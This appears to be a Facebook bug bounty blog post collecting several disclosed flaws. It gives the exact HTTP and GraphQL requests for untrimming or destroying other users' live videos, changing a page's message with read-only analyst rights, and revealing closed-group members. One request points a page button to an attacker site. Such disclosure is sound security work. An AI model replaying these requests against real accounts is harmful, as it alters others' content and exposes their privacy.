Description / Impact

It’s possible to untrim any live video on Facebook on behalf of the owners.

Impact

This could let a malicious user untrim any live video on Facebook using non GraphQL.

Proof Of Concept / Reprosteps

1. Obtain target live video ID
2. Submit the request with the value above (remember to update your CSRF token)

HTTP POST
/video_broadcast/trim/?new_start_seconds=0&new_end_seconds=99999999&reset_trimming=1&video_id=valueFromStep1&fb_dtsg=

Host: facebook.com

Response

{
“__ar”: 1,
“payload”: {},
“hsrp”: {
“hblp”: {
“sr_revision”: 1002775749,
“consistency”: {
“rev”: 1002775749
}

The target live video has been untrimed on behalf of the owners.

Timeline:

06/10/2020 : Report sent

Triaged by Facebook after 6 hours

10/10/2020: $2875 bounty awarded during BountyCon 2020 (with bonus)

21/10/2020: Patch confirmed by Facebook


Description / Impact

In a FB5 there is an update related to COVID-19 which allow a page to pending there customer service as a result of Coronavirus, this action require high permission to be made on behalf the page but according to my testing I observe that it ‘s possible to update business fyi message with the analyst permissions.

This behavior is unexpected since the analyst permissions is generally read-only permissions.

Proof Of Concept / Reprosteps

  • Obtain the page ID
  • Submit the request
HTTP POST /api/graphql/?av=valueObtainedFromStepOne 
Host: facebook.com
variables={"input":{"business_fyi_message_type":"POLICY_UPDATES","end_point":"settings_page_info","entry_point":"page_settings","page_id":"valueObtainedFromStepOne","actor_id":"valueObtainedFromStepOne","client_mutation_id":"4"}}&doc_id=2964825706964540
  • Display a button that links to your own URL
HTTP POST /api/graphql/?av=valueObtainedFromStepOne 
Host: facebook.com
variables={"input":{"business_fyi_link":"https://www.attackerSite.com/","end_point":"settings_page_info","entry_point":"page_settings","page_id":"ValueFromStepOne","actor_id":"ValueFromStepOne","client_mutation_id":"1"}}&doc_id=2674516042648125


Description / Impact

There is a feature (video trimming) which allow Facebook users to remove unnecessary content from their live videos.Only owners can made this on their behalf but according to my testing I observe that it is possible to trim any live video on behalf of the owners which isn’t expected behavior

Impact

Anyone can trim any live video on Facebook. Trimming video to 5 milliseconds will cause the video to be 0 seconds long and the owner won’t be able to untrim it.

Proof Of Concept / Reprosteps

1. Obtain target live video ID
2. Obtain current user ID
3. Copy the request

POST
/api/graphql/?__a=1&doc_id=3975916122480615&variables{"input":{"end_time_ms":12000,"start_time_ms":0,"video_id":"valueFromStepOne","actor_id":"ValueFromStepTwo","client_mutation_id":"1"}}

4.Update…


Description / Impact

When a Facebook user approved as a member in a closed group, only the group members/admins have a permissions to see his/her membership but according to my testing I find that any non-member being able to disclose approved members in any closed Facebook group.

Proof Of Concept / Reprosteps

  • Submit the following request via user(A) just before user(B) has any kind of relationship with the closed group(D):
POST /api/graphql/?doc_id=2416329748453695 HTTP/1.1
Host: facebook.com

variables=%7B%22groupID%22%3A%22Group_D_ID%22%2C%22memberID%22%3A%22
User_B_ID%22%7D

Response

{ 
"data":{
"group":{
"id":"2082572965383830",
"can_viewer_claim_adminship":false,
"membership":null
}
}
}

membership=NULL
this is because no relationship in the past between User(B) and the closed group(D)

  • Now repeat step 1 just after…

Ahmad Talahmeh

Security Researcher

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store